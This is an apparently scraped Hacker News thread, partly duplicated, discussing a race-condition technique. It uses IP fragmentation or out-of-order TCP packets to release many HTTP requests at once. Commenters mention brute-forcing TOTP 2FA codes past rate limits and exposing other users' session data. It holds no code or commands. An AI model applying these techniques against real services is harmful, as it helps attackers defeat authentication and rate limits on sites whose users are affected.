It should be noted that IP fragmentation is quite limited and often buggy. IPv6 only requires receivers to re-assemble an IP packet that is at most 1500 bytes, so sending a 65KB TCP segment is quite likely to just result in dropped packets.
Alternatively, the 1500 limit is not a hard limit, and depends entirely on your link. Jumbo frames (~9000 bytes) and even beyond are possible if all the devices are configured in the right way. Additionally, IPv6 actually supports packets up to ~4GiB in size (so called "jumbograms", with an additional header), though I think it would be truly hard to find any network which uses this feature.
> Alternatively, the 1500 limit is not a hard limit, and depends entirely on your link.
The two concepts are completely independent and orthogonal. You can have a 1280 byte link MTU on a device which happily reassembles 9x fragments into a 9000 byte payload. You can also have another device with a 9000 byte link MTU which refuses to reassemble 2x 1280 byte fragments into a single 2000 byte packet simply because it doesn't have to. Both devices are IPv6 compliant.
Well, I suppose there is 1 causal relationship between link layer MTU and IPv6 fragmentation: "how much bigger than 1280 bytes can the individual fragments be".
Indeed. If the attack works by exploiting (reliable) TCP re-ordering algorithms in the server then why also bother with (unreliable) IP fragmentation? Just send a larger number of out-of-order TCP packets, surely?
Two techniques, even: More requests processed at once, after a very (bandwidth-adjusted) precisely user-controlled starting point.
One helps with race conditions in the server, the other helps racing 3rd party requests. Sending a highly-efficient "go" packet for many HTTP requests is sure ruining the fun for all the others awaiting some pre-announced concert ticket / GPU sale to open.
If the website accounting is merely "eventually consistent" between threads/servers and you are able to fire many (large) requests at a precise (determined by small packet) point in time, both techniques work in tandem - could have (one of) your post(s) appear with repeating digits (such as at https://news.ycombinator.com/item?id=42000000) without just seeing "Sorry, we're not able to serve your requests this quickly."
I think it's ultimately about bypassing a TOTP 2FA by exploiting a race condition in the authentication failure backoff timer to submit thousands of possible codes simultaneously. The technique is about abusing the TCP stack and IP fragmentation to load up the stack on the server with as much data as possible before hitting it with a "go" packet that completes the fragments on the head of line blocking data buffer and spills all of the contents into the webserver before a single RTT can be completed.
Many real-world web applications “shockingly” don’t guarantee ACID-style transactional state updates, and thus are vulnerable to race conditions.
Suppose (for instance) that the application tier caches user session information by some internal, reused ID.
If that state is updated transactionally, with an ID assigned to a new session atomically with the insertion of that new session’s data, no problem.
But if the session is assigned a previously used ID a few microseconds before the new session’s data is populated, a racing request could see the old data from a different user.
I assume with HTTP/1.1 this would be less useful, since each synchronized request would require another socket, thus hitting potential firewalls limiting SYN/SYN-ACK rate and/or concurrent connections from the same IP.
In some respects this is abusing the exact reason we got HTTP/3 to replace HTTP/2 – it's a deliberate Head-of-Line (HoL) blocking.
You can pipeline requests on http/1.1. But most servers handle one request at a time, and don't read the next request until the current request's response is finished. (And mainstream browsers don't typically issue pipelined requests on http/1.1, IIRC)
If you have a connection per request, and you need 1000 requests to be 'simultaneous', you've got to get a 1000 packet burst to arrive closely packed, and that's a lot harder than this method (or a similar method suggested in comments of sending unfragmented tcp packets out of order so when the first packet of the sequence is recieved, the rest of the packets are already there)
[+] [-] com|1 year ago|reply
[+] [-] phito|1 year ago|reply
[+] [-] floydian10|1 year ago|reply
[+] [-] genter|1 year ago|reply
[+] [-] EADDRINUSE|1 year ago|reply
[+] [-] xcdzvyn|1 year ago|reply
[deleted]
[+] [-] simiones|1 year ago|reply
Alternatively, the 1500 limit is not a hard limit, and depends entirely on your link. Jumbo frames (~9000 bytes) and even beyond are possible if all the devices are configured in the right way. Additionally, IPv6 actually supports packets up to ~4GiB in size (so called "jumbograms", with an additional header), though I think it would be truly hard to find any network which uses this feature.
[+] [-] zamadatix|1 year ago|reply
The two concepts are completely independent and orthogonal. You can have a 1280 byte link MTU on a device which happily reassembles 9x fragments into a 9000 byte payload. You can also have another device with a 9000 byte link MTU which refuses to reassemble 2x 1280 byte fragments into a single 2000 byte packet simply because it doesn't have to. Both devices are IPv6 compliant.
Well, I suppose there is 1 causal relationship between link layer MTU and IPv6 fragmentation: "how much bigger than 1280 bytes can the individual fragments be".
[+] [-] gnfargbl|1 year ago|reply
[+] [-] unknown|1 year ago|reply
[deleted]
[+] [-] nine_k|1 year ago|reply
[+] [-] wrs|1 year ago|reply
[+] [-] AstralStorm|1 year ago|reply
[+] [-] edelbitter|1 year ago|reply
If the website accounting is merely "eventually consistent" between threads/servers and you are able to fire many (large) requests at a precise (determined by small packet) point in time, both techniques work in tandem - could have (one of) your post(s) appear with repeating digits (such as at https://news.ycombinator.com/item?id=42000000) without just seeing "Sorry, we're not able to serve your requests this quickly."
[+] [-] jandrese|1 year ago|reply
[+] [-] twoodfin|1 year ago|reply
Suppose (for instance) that the application tier caches user session information by some internal, reused ID.
If that state is updated transactionally, with an ID assigned to a new session atomically with the insertion of that new session’s data, no problem.
But if the session is assigned a previously used ID a few microseconds before the new session’s data is populated, a racing request could see the old data from a different user.
[+] [-] AnssiH|1 year ago|reply
[+] [-] weissnick|1 year ago|reply
The same paper is also referenced to by James Kettle in his research.
[+] [-] algesten|1 year ago|reply
In some respects this is abusing the exact reason we got HTTP/3 to replace HTTP/2 – it's a deliberate Head-of-Line (HoL) blocking.
[+] [-] toast0|1 year ago|reply
If you have a connection per request, and you need 1000 requests to be 'simultaneous', you've got to get a 1000 packet burst to arrive closely packed, and that's a lot harder than this method (or a similar method suggested in comments of sending unfragmented tcp packets out of order so when the first packet of the sequence is recieved, the rest of the packets are already there)
[+] [-] unknown|1 year ago|reply
[deleted]
[+] [-] Out_of_Characte|1 year ago|reply
[+] [-] layer8|1 year ago|reply
[+] [-] tontonius|1 year ago|reply
[+] [-] FuriouslyAdrift|1 year ago|reply
[+] [-] simiones|1 year ago|reply
[+] [-] Alifatisk|1 year ago|reply